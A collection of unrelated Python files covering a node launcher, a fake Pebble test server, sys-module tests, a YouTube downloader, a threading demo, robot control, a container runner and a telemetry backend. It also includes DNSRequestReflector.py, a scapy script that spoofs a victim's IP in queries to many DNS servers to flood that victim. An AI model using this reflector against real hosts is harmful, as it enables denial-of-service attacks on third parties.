identifier += 1
for attribute1, value1 in value.iteritems():
if "network" in attribute1:
destination = value1
host = destination.split(':')[0]
port = destination.split(':')[1]
print(host)
print(owndnsname)
if (host == ownip ) or (host == owndnsname) or (host == "127.0.0.1"):
if debugtarget == identifier:
if debugengine == "gdb":
t = threading.Thread(target=run_node_debug, args=(port, identifier))
elif debugengine == "valgrind":
t = threading.Thread(target=run_node_valgrind, args=(port, identifier))
elif debugengine == "sgx-gdb":
t = threading.Thread(target=run_node_sgx_debug, args=(port, identifier))
elif debugengine == "callgrind":
t = threading.Thread(target=run_node_callgrind, args=(port, identifier))
else:
t = threading.Thread(target=run_node, args=(port, identifier))
else:
t = threading.Thread(target=run_node, args=(port, identifier))
t.start()
thread_arr.append(t)
else:
#setup key exchange beforehand to avoid password for each copy
print("PREREQUISITE BEFORE EXECUTING")
print("Create ssh identity and copy ids to remote machines: ")
print(" ssh-keygen -t rsa")
print(" ssh-copy-id myname@somehos")
os.system("ssh " + str(getpass.getuser())+ "@" + host + " 'rm -r -f output/'")
os.system("ssh " + str(getpass.getuser())+ "@" + host + " 'mkdir -p output'")
os.system("scp -r output/* "+ str(getpass.getuser())+ "@" + host + ":~/output/")
#old rsync, not used anymore
#os.system('''rsync --delete --ignore-times --ignore-existing -arvce "ssh -o StrictHostKeyChecking=no" -r ~/output/ '''+ host +''':~/output/''')
t = threading.Thread(target=run_node_remote,args=(host, port, identifier))
t.start()
thread_arr.append(t)
while True:
time.sleep(1)
|
fake_pebble.py
|
# Copyright 2021 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fake (partial) Pebble server to allow testing the HTTP-over-Unix-socket protocol."""
import http.server
import json
import os
import re
import socketserver
import tempfile
import threading
import urllib.parse
class Handler(http.server.BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.routes = [
('GET', re.compile(r'^/system-info$'), self.get_system_info),
('POST', re.compile(r'^/services$'), self.services_action),
]
self._services = ['foo']
super().__init__(request, ('unix-socket', 80), server)
def log_message(self, format, *args):
# Disable logging for tests
pass
def respond(self, d, status=200):
self.send_response(status)
self.send_header('Content-Type', 'application/json')
self.end_headers()
d_json = json.dumps(d, indent=4, sort_keys=True)
self.wfile.write(d_json.encode('utf-8'))
def bad_request(self, message):
d = {
"result": {
"message": message,
},
"status": "Bad Request",
"status-code": 400,
"type": "error"
}
self.respond(d, 400)
def not_found(self):
d = {
"result": {
"message": "invalid API endpoint requested"
},
"status": "Not Found",
"status-code": 404,
"type": "error"
}
self.respond(d, 404)
def method_not_allowed(self):
d = {
"result": {
"message": 'method "PUT" not allowed'
},
"status": "Method Not Allowed",
"status-code": 405,
"type": "error"
}
self.respond(d, 405)
def internal_server_error(self, msg):
d = {
"result": {
"message": "internal server error: {}".format(msg),
},
"status": "Internal Server Error",
"status-code": 500,
"type": "error"
}
self.respond(d, 500)
def do_GET(self): # noqa: N802
self.do_request('GET')
def do_POST(self): # noqa: N802
self.do_request('POST')
def do_request(self, request_method):
path, _, query = self.path.partition('?')
path = urllib.parse.unquote(path)
query = dict(urllib.parse.parse_qsl(query))
if not path.startswith('/v1/'):
self.not_found()
return
path = path[3:]
allowed = []
for method, regex, func in self.routes:
match = regex.match(path)
if match:
if request_method == method:
data = self.read_body_json()
try:
func(match, query, data)
except Exception as e:
self.internal_server_error(e)
raise
return
allowed.append(method)
if allowed:
self.method_not_allowed()
return
self.not_found()
def read_body_json(self):
try:
content_len = int(self.headers.get('Content-Length', ''))
except ValueError:
content_len = 0
if not content_len:
return None
body = self.rfile.read(content_len)
if isinstance(body, bytes):
body = body.decode('utf-8')
return json.loads(body)
def get_system_info(self, match, query, data):
self.respond({
"result": {
"version": "3.14.159"
},
"status": "OK",
"status-code": 200,
"type": "sync"
})
def services_action(self, match, query, data):
action = data['action']
services = data['services']
if action == 'start':
for service in services:
if service not in self._services:
self.bad_request('service "{}" does not exist'.format(service))
return
self.respond({
"change": "1234",
"result": None,
"status": "Accepted",
"status-code": 202,
"type": "async"
})
else:
self.bad_request('action "{}" not implemented'.format(action))
def start_server():
socket_dir = tempfile.mkdtemp(prefix='test-ops.pebble')
socket_path = os.path.join(socket_dir, 'test.socket')
server = socketserver.UnixStreamServer(socket_path, Handler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
def shutdown():
server.shutdown()
server.server_close()
thread.join()
os.remove(socket_path)
os.rmdir(socket_dir)
return (shutdown, socket_path)
if __name__ == '__main__':
import time
shutdown, socket_path = start_server()
print('Serving HTTP over socket', socket_path)
# Wait forever (or till Ctrl-C pressed)
try:
while True:
time.sleep(1)
finally:
shutdown()
|
DNSRequestReflector.py
|
#!/usr/bin/python
from scapy.all import *
from threading import *
from optparse import OptionParser
#import time
import socket
def queryDnsServer(targetHost,dnsServer):
answer = IP(dst=dnsServer,src=targetHost)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.thepacketgeek.com")) #just fire the packet ;)
send(answer)
def readDnsServersFromFile(targetHost,dnsServersFile):
f = open(dnsServersFile,'r')
for line in f.readlines():
dnsServer = line.strip('\r').strip('\n')
print "Sending DNS request to: "+str(dnsServer)
t = Thread(target=queryDnsServer,args=(targetHost,dnsServer))
child = t.start()
def main():
parser = OptionParser()
parser.add_option("-t", "--tgtHost", dest="tgtHost",
help="tgtHost", metavar="tgtHost")
parser.add_option("-f", "--dnsServersFile", dest="dnsServersFile",
help="dnsServersFile", metavar="dnsServersFile")
(options, args) = parser.parse_args()
if options.tgtHost is None and options.dnsServersFile is None:
parser.print_help()
exit(0)
targetHost = options.tgtHost
dnsServers = options.dnsServersFile
readDnsServersFromFile(targetHost,dnsServers)
if __name__ == '__main__':
main()
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_main():
test.test_support.run_unittest(SysModuleTest)
if __name__ == "__main__":
test_main()
|
tube_loader.py
|
from pytube import YouTube
from tkinter import *
from tkinter.filedialog import askdirectory
from tkinter.messagebox import showinfo
from threading import *
file_size = 0
# to show the progress of download
def progress_of_download(stream=None, chunk=None, bytes_remaining=None):
global file_size
#getting the percentage of the file
file_downloaded = (file_size - bytes_remaining)
percntg = (file_downloaded / file_size) * 100
Download_btn.config(text='{:00.0f} % downloaded'.format(percntg))
def startDownload():
global file_size
try:
url = urlfield.get()
# chnaging button text
Download_btn.config(text="please wait...")
Download_btn.config(state=DISABLED)
path_to_save_video= askdirectory()
if path_to_save_video is None:
return
ob = YouTube(url, on_progress_callback=progress_of_download)
strm = ob.streams[0]
file_size = strm.filesize
strm.download(path_to_save_video)
Download_btn.config(text="Start Download")
Download_btn.config(state=NORMAL)
showinfo("Download Finished","Downloaded successfully")
urlfield.delete(0,END)
except Exception as e:
print(e)
print("error !!")
def start_Download_Thread():
# creating thread
thread = Thread(target=startDownload)
thread.start()
# starting gui building
main=Tk()
main.title("Youtube Downloader")
#seting icon
main.iconbitmap('icon.ico')
main.geometry("500x400")
#creating icon of the gui
File = PhotoImage(file='image.png')
headingIcon = Label(main, image=File)
headingIcon.pack(side=TOP)
#creating field to enter url
urlfield = Entry(main, width=25, font=("verdana",17),justify= CENTER)
urlfield.pack(side=TOP)
#creating download button
Download_btn = Button(main, text="start download",command= start_Download_Thread)
Download_btn.pack(side=TOP,pady=10)
main.mainloop()
|
threading_semaphore_demo03.py
|
# -*- coding: utf-8 -*-
import threading
import time
import random
semaphore = threading.Semaphore(value=0)
def consumer():
print("consumer is waiting")
semaphore.acquire()
print("Consumer notify: consumerd item number {}".format(item))
def producer():
global item
time.sleep(10)
item = random.randint(0, 1000)
print("producer notify: produced item number {}".format(item))
semaphore.release()
if __name__ == '__main__':
for i in range(5):
t1 = threading.Thread(target=producer)
t2 = threading.Thread(target=consumer)
t1.start()
t2.start()
t1.join()
t2.join()
print("program done")
|
robot.py
|
# This is an example program showing different methods of controlling motors, servos, and Neopixels.
# It works with a Rock Candy or PiHut PS3 controller.
# The left stick controls the speed and direction of both motors - push up to go forwards, down for backwards and left or right to steer.
# The right stick directly controls two servo motors connected to GPIO pins 21 and 22.
# The R1 button starts or stops turbo mode (the robot goes faster!) .
# The L1 and L2 buttons move a servo connected to GPIO 22 to two pre-set positions.
# The Square button starts or stops a servo connected to GPIO 20 slowly sweeping left to right. This uses multiprocessing to run at the same time as the main program loop.
# The Triangle, Circle, and X buttons start and stop different Neopixels sequences - also with multiprocessing.
# Author: Neil Lambeth. neil@redrobotics.co.uk @NeilRedRobotics
from __future__ import print_function # Make print work with python 2 & 3
from evdev import InputDevice, ecodes
import redboard
import multiprocessing
import time
try:
import neopixels # Neopixels need to be run with 'sudo', just a reminder!
except RuntimeError:
print ('')
print ("Remember to use 'sudo' if you're using neopixels!")
print ('')
exit()
dev = InputDevice('/dev/input/event0')
#print(dev)
device = str(dev).find('Rock Candy') # Look for a Rock Candy or PiHut controller
if device != -1:
print ('Controller: Rock Candy PS3 Gamepad')
controller = 1
else:
print ('Controller: PiHut PS3 Gamepad')
controller = 2
# Button mapping for different controllers
if controller == 1: # Rock Candy
triangle, x, square, circle = 307, 305, 304, 306
R1, R2, R3 = 309, 311, 315
L1, L2, L3 = 308, 310, 314
select, start, home = 312, 313, 316
if controller == 2: # PiHut
triangle, x, square, circle = 308, 304, 307, 305
R1, R2, R3 = 311, 313, 318
L1, L2, L3 = 310, 312, 317
select, start, home = 314, 315, 316
# Set up variables
RX = 0
LX = 0
RY = 0
RY = 0
LeftY = 0
LeftX = 0
LeftX_R = 0
LeftX_L = 0
Leftmotor = 0
Rightmotor = 0
LM_OLD = 0
RM_OLD = 0
turbo = False
invertX = False
triangleToggle = False
xToggle = False
circleToggle = False
squareToggle = False
# Function to use with multiprocessing to sweep a servo slowly left and right
# without interrupting the normal program flow
def servoSlowSweep():
#print ('Servo Slow')
while True:
for i in range(600,2400,5):
redboard.servo20_P(i)
time.sleep(0.05)
for i in range(2400,600,-5):
redboard.servo20_P(i)
time.sleep(0.05)
# Set up neopixel processes - neopixel code is in ~/RedBoard/neopixels.py
p1 = multiprocessing.Process(target = neopixels.knightRider)
p1.start() # Start the neopixel display when the program starts
triangleToggle = True
p2 = multiprocessing.Process(target = neopixels.headLights)
p3 = multiprocessing.Process(target = neopixels.demo)
p4 = multiprocessing.Process(target = servoSlowSweep)
# Read gamepad buttons-----------------------------------------------------------
for event in dev.read_loop():
#print(event) # Uncomment to show all button data
if event.type == ecodes.EV_KEY:
#print(event.code) # Uncomment to show each keycode
# Button pressed code
if event.value == 1:
if event.code == triangle and triangleToggle == False: # Toggles the button press - one press for on - one press for off.
triangleToggle = True
print ('triangle on')
# Start and stop the neopixel processes - it's important to only run one neopixel process at any one time. So check and stop other processes if they are running.
if p1.is_alive() == False: # Make sure the process isn't already running
if p2.is_alive() == True: # Kill the other process if it's running
p2.terminate()
if p3.is_alive() == True: # Kill the other process if it's running
p3.terminate()
p1 = multiprocessing.Process(target = neopixels.knightRider)
p1.start() # Start the process
elif event.code == triangle and triangleToggle == True:
triangleToggle = False
print ('triangle off')
p1.terminate()
neopixels.clear()
elif event.code == x and xToggle == False:
xToggle = True
print ('X on')
if p2.is_alive() == False: # Make sure the process isn't already running
if p1.is_alive() == True: # Kill the other process if it's running
p1.terminate()
if p3.is_alive() == True: # Kill the other process if it's running
p3.terminate()
p2 = multiprocessing.Process(target = neopixels.headLights)
p2.start() # Start the process
elif event.code == x and xToggle == True:
xToggle = False
print ('x off')
p2.terminate()
neopixels.clear()
elif event.code == circle and circleToggle == False:
circleToggle = True
print ('Circle on')
if p3.is_alive() == False: # Make sure the process isn't already running
if p1.is_alive() == True: # Kill the other process if it's running
p1.terminate()
if p2.is_alive() == True: # Kill the other process if it's running
p2.terminate()
p3 = multiprocessing.Process(target = neopixels.demo)
p3.start() # Start the process
elif event.code == circle and circleToggle == True:
circleToggle = False
print ('Circle off')
p3.terminate()
neopixels.clear()
elif event.code == square and squareToggle == False:
squareToggle = True
print ('Square on')
if p4.is_alive() == False: # Make sure the process isn't already running
p4 = multiprocessing.Process(target = servoSlowSweep)
p4.start() # Start the process
elif event.code == square and squareToggle == True:
squareToggle = False
print ('Square off')
p4.terminate()
elif event.code == R1:
print ('R1 - Turbo On')
turbo = True
elif event.code == R2:
print ('R2')
elif event.code == R3:
print ('R3')
elif event.code == L1:
print ('L1')
redboard.servo22(80) # Send the positon to the servo
elif event.code == L2:
print ('L2')
redboard.servo22(-80) # Send the positon to the servo
elif event.code == L3:
print ('L3')
elif event.code == select and invertX == False:
print ('Invert X')
invertX = True
elif event.code == select and invertX == True:
print ('Normal X')
invertX = False
elif event.code == start:
print ('Start')
elif event.code == home:
print ('Home')
# Button Release Code------------------------------------------------
if event.value == 0: # Button released
if event.code == R1: # Turbo Off
print ('R1 - Turbo Off')
turbo = False
elif event.code == R2:
print ('R2')
elif event.code == L1 or event.code == L2: # Servos Centre
print ('Servo Centre')
redboard.servo22(0)
# Analogue Sticks and Dpad---------------------------------------------
if event.type == ecodes.EV_ABS:
print('')
print('---------------------------------')
# Dpad
if event.code == 16:
if event.value == -1:
print ('Dpad LEFT')
if event.value == 1:
print ('Dpad RIGHT')
if event.code == 17:
if event.value == -1:
print ('Dpad UP')
if event.value == 1:
print ('Dpad DOWN')
# Right analogue stick servo controls
elif event.code == 5: # Right analogue Vertical stick
RY = event.value
#print (RY)
S21 = redboard.mapServo(RY) # Scale the value from the
# joystick to work with the servo
redboard.servo21_P(S21) # Send the positon to the servo
elif event.code == 2: # Right analogue Horizontal stick
RX = event.value
#print (RX)
S22 = redboard.mapServo(RX) # Scale the value from the
# joystick to work with the servo
redboard.servo22_P(S22) # Send the positon to the servo
# Left analogue stick motor controls
if event.code == 1: # Left analogue Vertical stick
# The analogue stick gives a value between 0-255
# Convert the value to 0-127 for forwards
# and 0- -127 for backwards
LY = event.value
if LY < 128: # Forwards
LeftY = 127 - LY
#print('LY =',LY)
#print('LeftY = ',LeftY)
elif LY >= 128: # Backwards
LeftY = LY - 128
LeftY = -LeftY # Make negative
#print('LY =',LY)
#print('LeftY = ',LeftY)
elif event.code == 0: # Left analogue Horizontal stick
# The analogue stick gives a value between 0-255
# Convert the value to 0-127 for left
# and 0-127 for right
LX = event.value
if LX < 128: # Left
LeftX_L = 127 - LX
#print('LX =',LX)
#print('LeftX_Left = ',LeftX_L)
if LX > 128: # Right
LeftX_R = LX - 128
#print('LX = ',LX)
#print('LeftX_Right = ',LeftX_R)
if LX == 128: # Make sure both values are zero if stick is in the centre
LeftX_L = 0
LeftX_R = 0
# Prepare the values to send to the motors
if LeftY == 0: #Turn on the spot if not going forwards or backwards
if LX <= 128: # Turn Left
Leftmotor = -LeftX_L # Reverse motor to turn on the spot
Rightmotor = LeftX_L
elif LX >= 127: # Turn Right
Leftmotor = LeftX_R
Rightmotor = -LeftX_R # Reverse motor to turn on the spot
elif LY <= 128: # Forwards
print ('Forwards')
Leftmotor = LeftY - LeftX_L # Mix steering values
if Leftmotor <1: # Stop motor going backwards
Leftmotor = 0;
Rightmotor = LeftY - LeftX_R # Mix steering values
if Rightmotor <1: # Stop motor going backwards
Rightmotor = 0;
elif LY >= 127: # Backwards
print('Backwards')
Leftmotor = LeftY + LeftX_L # Mix steering values
if Leftmotor >-1: # Stop motor going forwards
Leftmotor = 0;
Rightmotor = LeftY + LeftX_R # Mix steering values
if Rightmotor >-1: # Stop motor going forwards
Rightmotor = 0;
if turbo == True: # Double speed for turbo
LM = Leftmotor * 2
RM = Rightmotor * 2
else: # Normal speed
LM = Leftmotor
RM = Rightmotor
if LM != LM_OLD or RM != RM_OLD: # Only print motor speeds if they have changed
print ('Left motor =',LM)
print ('Right motor =',RM)
LM_OLD = LM
RM_OLD = RM
# Set motor speed and direction
if invertX == True: # Reverse steering controls
#print('Reverse steering')
redboard.M2_8bit(RM)
redboard.M1_8bit(LM)
else: # Normal steering controls
#print ('Normal steering')
redboard.M2_8bit(LM)
redboard.M1_8bit(RM)
|
ShifterRunner.py
|
import os
from threading import Thread
from subprocess import Popen, PIPE
from select import select
class ShifterRunner:
"""
This class provides the container interface for Docker.
"""
def __init__(self, logger=None):
"""
Inputs: config dictionary, Job ID, and optional logger
"""
self.logger = logger
self.containers = []
self.threads = []
def _readio(self, p, job_id, queues):
cont = True
last = False
while cont:
rlist = [p.stdout, p.stderr]
x = select(rlist, [], [], 1)[0]
for f in x:
if f == p.stderr:
error = True
else:
error = False
line = f.readline().decode('utf-8')
if len(line) > 0:
self.logger.log_lines([{'line': line, 'error': error}])
if last:
cont = False
if p.poll() is not None:
last = True
for q in queues:
q.put(['finished', job_id, None])
def get_image(self, image):
# Do a shifterimg images
lookcmd = ['shifterimg', 'lookup', image]
proc = Popen(lookcmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
id = stdout.decode('utf-8').rsplit()
if id == '':
cmd = ['shifterimg', 'pull', image]
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
id = stdout.decode('utf-8').rsplit()
return id
def run(self, job_id, image, env, vols, labels, queues):
cmd = [
'shifter',
'--image=%s' % (image)
]
# Should we do somehting with the labels?
newenv = os.environ
for e in env.keys():
newenv[e] = env[e]
proc = Popen(cmd, bufsize=0, stdout=PIPE, stderr=PIPE, env=newenv)
out = Thread(target=self._readio, args=[proc, job_id, queues])
self.threads.append(out)
out.start()
self.containers.append(proc)
return proc
def remove(self, c):
# Kill process
c.kill()
|
RicardoBackend.py
|
import multiprocessing
import argparse
import signal
import sys
import redis
from Interfaces import commandlineinterface
from Interfaces import flaskinterface
from RicardoHandler import serialmanager
from RicardoHandler import telemetryhandler
from RicardoHandler import telemetrylogger
# Argument Parsing
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--device", required=True, help="Ricardo Serial Port", type=str)
ap.add_argument("-b", "--baud", required=False, help="Serial Port Baud Rate", type=int,default=115200)
ap.add_argument("--flask-host", required=False, help="flask host", type=str,default="0.0.0.0")
ap.add_argument("--flask-port", required=False, help="flask Port", type=int,default = 1337)
ap.add_argument("-v", "--verbose", required=False, help="Enable Verbose Mode", action='store_true')
ap.add_argument("--redis-host", required=False, help="redis host", type=str,default = "localhost")
ap.add_argument("--redis-port", required=False, help="redis port", type=int,default = 6379)
ap.add_argument('-l','--logger', required=False, help="Enable Telemetry logging",action='store_true',default=False)
argsin = vars(ap.parse_args())
def exitBackend(proclist):
for key in proclist:
print("Killing: " + key + " Pid: " + str(proclist[key].pid))
proclist[key].terminate()
proclist[key].join()
proclist = {}
sys.exit(0)
def checkRedis():
try:
server = redis.Redis(host=argsin["redis_host"],port=argsin["redis_port"])
server.ping()
except redis.exceptions.ConnectionError:
errormsg = "[ERROR] -> Redis server not found at host:'" + argsin["redis_host"] + "' port:" + str(argsin["redis_port"]) + "\nPlease check redis is running"
sys.exit(errormsg)
def startSerialManager(args):
serman = serialmanager.SerialManager(device = args["device"],
baud = args["baud"],
redishost = args["redis_host"],
redisport=args["redis_port"])
serman.run()
def startTelemetryHandler(args,taskid):
telemetrytask = telemetryhandler.TelemetryHandler(redishost = args["redis_host"],
redisport=args["redis_port"],
clientid=taskid)
telemetrytask.run()
def startTelemetryLogger(args):
logger = telemetrylogger.TelemetryLogger(redishost=args['redis_host'],
redisport=args['redis_port'],
filename="telemetry_log")
logger.run()
if __name__ == '__main__':
proclist = {}
#check redis server is running
checkRedis()
proclist['serialmanager'] = multiprocessing.Process(target=startSerialManager,args=(argsin,))
proclist['serialmanager'].start()
#start telemetry handler process
telemetrytask_id = "LOCAL:TELEMETRYTASK"
proclist['telemetryhandler'] = multiprocessing.Process(target=startTelemetryHandler,args=(argsin,telemetrytask_id,))
proclist['telemetryhandler'].start()
#start flask interface process
proclist['flaskinterface'] = multiprocessing.Process(target=flaskinterface.startFlaskInterface,args=(argsin['flask_host'],
argsin['flask_port'],
argsin['redis_host'],
argsin['redis_port'],))
proclist['flaskinterface'].start()
if (argsin['logger']):
proclist['telemetrylogger'] = multiprocessing.Process(target=startTelemetryLogger,args=(argsin,))
proclist['telemetrylogger'].start()
c = commandlineinterface.CommandLineInterface(redishost=argsin['redis_host'],
redisport=argsin['redis_port'],
)
c.cmdloop()
exitBackend(proclist)
|
trainer.py
|
#!/usr/bin/env python3
########################################################################################
#
# Name: Trains a sniffer on what non-padded responses correspond to submitted
# hash prefixes.
#
# Written by Matt Weir
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#
# Contact Info: cweir@vt.edu
#
